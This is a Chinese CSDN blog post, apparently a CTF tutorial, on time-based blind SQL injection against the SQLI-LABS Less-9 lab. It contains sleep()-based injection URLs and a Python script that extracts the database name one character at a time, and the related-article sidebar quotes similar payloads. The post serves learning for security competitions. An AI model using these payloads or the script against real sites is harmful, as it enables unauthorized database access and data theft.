SQL注入-GET型-单参数-时间型盲注

最新推荐文章于 2023-07-25 16:52:22 发布
最新推荐文章于 2023-07-25 16:52:22 发布
阅读量266 收藏 1
点赞数 1
分类专栏: CTF 文章标签: sql python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33505576/article/details/120457614
版权

1、概要
现在的CTF竞赛,WEB类型的题目,SQL注入可以说是必考题,而且,现在的SQL注入题目越来越难了,各种过滤,所以我们的SQL注入神器SQLMAP基本上可以说是没用了,必须要我们自己写脚本和payload进行手工注入,本篇文章以GET型-单参数-时间型盲注为例,总结一下这类题型的做题方法,不喜勿喷。

2、审题
拿到SQL注入的题目,首先要审题,并结合提示看是考察union select注入、报错注入、盲注还是堆叠注入,难题一般都是考察盲注。判断存在什么类型的注入不难,属于基础内容,这里不进一步去展开,感兴趣的可以去刷一刷SQLI-LABS。

3、实例说明
这里还是以SQLI-LABS-less9为例,当然这题比较简单,没有过滤,用SQLMAP也能跑出来,我们不用SQLMAP去跑,这里主要是拿这题介绍如何自己写python脚本进行注入的思路。

1)首先我们还是要手工先构造一个payload出来,确认确实是时间型盲注,payload如下:

获取库长的payload:

http://52fd88b7078b4e18836e596d270fa58a.app.mituan.zone/Less-9/?id=1' and if(length(database())=8,sleep(1),1)--+

获取库名的payload:

http://52fd88b7078b4e18836e596d270fa58a.app.mituan.zone/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(1),1)--+

发现确实存在时间型盲注。

2)根据payload的结构来写脚本,当然这里的代码的主要body结构是参照其他大佬的逻辑写的:

#encoding=utf-8

#时间盲注脚本-以SQLI-LABS less-9为例

import requests

import time

import datetime
#获取数据库长度
def database_len():
   
    #存放跑出的结果
    length=0
    database=''
    print ("start get length...")

    for l in range(1,15):

        startTime1=time.time()

        url1 = "http://52fd88b7078b4e18836e596d270fa58a.app.mituan.zone/Less-9/?id=1' and if(length(database())=%d,sleep(1),1)--+"%(l)

        response1 = requests.get(url1)

        if time.time() - startTime1 > 1:

            length+=l

    print ("the length :" , str(length))

       # break

    print ("start database sql injection...")
database_len()
#获取数据库名
def database_name():
    name = ''
    for j in range(1, 15):           #根据数据库名长度自行修改15这个数值
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = '''http://52fd88b7078b4e18836e596d270fa58a.app.mituan.zone/Less-9/'''
            payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(2),1)--+''' % (
                j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            r = requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 2:
                name += i
                print(name)
                break
    print('database_name:', name)


database_name()

4.代码逻辑说明:

1)时间型盲注需要有一个循环,依据时间差是否为sleep函数设定的值来判断跑出来的字符是否正确,如:

if time.time() - startTime1 > 1:

    length+=l

2)payload中有两个变量是需要控制的,分别是j和i,j对应%d的值,i对应%s的值,通过遍历的方式逐个去确定数据库名中的每一个字符;

3)最后总结一下代码的主体结构:
a.首先是基于python爬虫,利用requests不断发包,利用payload进行注入;
b.通过循环去遍历字符串,从而确认库名。
觉得有帮助给点个赞,顺便关注一下,谢谢啦,您的鼓励是我更新的动力。

复古追月
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全-实验七-SQL注入-+sqlmap使用.docx
11-10
仅仅为了大家更好的学习!
SQL注入之基于布尔的详解
09-10
首先说明的注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入一般分为布尔和基于时间。这篇文章主要讲解的是基于布尔的。下面来一起看看吧。
GET注入-
weixin_52620919的博客
11-17 474
,意味着页面不会显示SQL语句的错误,我们要通过一定的手段来判断构造的注入语句是否正确执行。 有两种方式:布尔时间。 布尔是根据页面是否正确显示来判断我们构造的语句是否正确执行,时间则是根据页面加载时间是否变化来判断的。 相关函数 需要掌握一些MySQL的相关函数: length(str): 返回str字符串的长度。如执行select length(database()) 则会返回当前数据库名称的长度。 而独selectdatabase()则回返回当前数据库的名称。 substr(
sql_1-2_get基于
weixin_44110913的博客
12-02 337
1
(手工)【sqli-labs40、41】堆叠注入
07-15 1544
SQL-堆叠、
基于GET的
LuckySec
02-11 554
介绍 先进行Boolean,若实在不行再进行时间 GET基于Boolean的,实验:sqli-labs less -8 输入:?id=1' and length(database()) = 10 --+ 输出:无任何信息 由此证明:数据库数为10错误 输入:?id=1' and length(database()) = 8 --+ 输出:You are in..............
SQL注入知识点总结
千寻的博客
02-11 1053
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 释第二节 mysql 元数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...
31-31.渗透测试SQL注入
最新发布
05-10
渗透测试SQL注入
SQL注入技巧-暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
Get
m0_69676459的博客
05-07 512
今日学习了相关的函数: length(str):返回字符串的长度 sub(str,a,b):从a的位置取出字符串的b个字符。eg.sub('abcd',1,1)='a' ascii(str):取出字符串第一个字符的ascii码值。 if(exp1,exp2,exp3)是一个条件判断语句,exp1位需要判断的语句,exp2是语句为真时执行的语句,exp3是语句为假时执行的语句。 eg.if(select database()= 'username',sleep(15),null)意思为当数据库的
GET
山兔的博客
08-01 246
一、sqlsql注入过程中, sql语句执行的选择后,选择的数据不能回显到前端页面。 类:基于布尔的SQL、基于时间SQL、基于报错的SQL。 Information_schema数据库基本表说明: schemata表:提供了当前mysql实例中所有的数据库信息 tables表:提供了关于数据库中的所有表的信息, columns表:提供表中所有列信息,即表明了表中所有列及每列的信息 任务描述: 注入流程: 1.根据提示加入id参数在url中,可以看到他不再像前面报错注入一样回显有效信
SQL注入——GET数字布尔
weixin_44889655的博客
10-12 445
GET数字布尔——墨者学院手工注入工具注入 手工注入 判断注入点 http://219.153.49.228:44957/new_list.php?id=1 and 1=1 http://219.153.49.228:44957/new_list.php?id=1 and 1=2 MySQL版本 http://219.153.49.228:44957/new_list.php?id=1 and substring(version(),1,1)=1 爆库 库长——长度为10 http://
SQL注入漏洞-GET注入
HacHunter的博客
03-05 2812
SQL 注入是一种攻击方式,在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。 SQL 注入的主要形式包括直接将代码插入到与 SQL 命令串联在一起并使其得以执行的用户输入变量。一种间接的攻击会将恶意代码注入要在表中存储或作为元数据存储的字符串。在存储的字符串随后串连到一个动态 SQ
SQL注入GET参数
FXHQAQ的博客
12-20 939
1、SQL注入漏洞介绍 sql注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 SQL注入的产生原因通常表现在以下几个方面:①不当的类处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处...
SQL 注入 GET
weixin_63279914的博客
07-25 302
SQL注入
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 750
owasp十大漏洞中第一的sql注入
SQL注入-GET参数注入
weixin_43850721的博客
01-20 699
CTF练习第一次CTF练习 第一次CTF练习 1.拿到虚拟机后开启 一开始想用外部Xshell连接它,被老冯骂了一顿 2.开启kali用nmap扫描该机器 nmap 192.168.80.135 发现该机器开启了22和80端口 说明该机器开启了ssh和http服务 3.浏览器查看该机器的http服务 http://192.168.80.135 发现网站,有四个页面,前三个是展示界面,第四个是登录界面 尝试登录 4.用burpsuite抓包 尝试进行用户名和密码爆破,失败 失败原因:密码字典不够强大(后面查看
SQL注入——GET类
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-03 2824
SQL注入——GET类 靶场地址 原理: sql注入就是利用GET传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息 第一题: 我们先在url栏测试一下,把id=1改成id=-1 结果页面就不显示了 表示存在sql注入漏洞我们再查看一下源码,发现它是自动闭合的,不需要我们输入代码闭合 接着,我在url轮流输入 order by 1,2,3.... 测试出它页面字段总数 在输入...
sql注入python脚本
04-06
是一种特殊类SQL注入攻击,攻击者无法直接获取数据库的具体信息,但可以通过不断尝试不同的条件来判断是否存在漏洞。 下面是一个使用Python编写的简SQL注入脚本的示例: ```python import ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值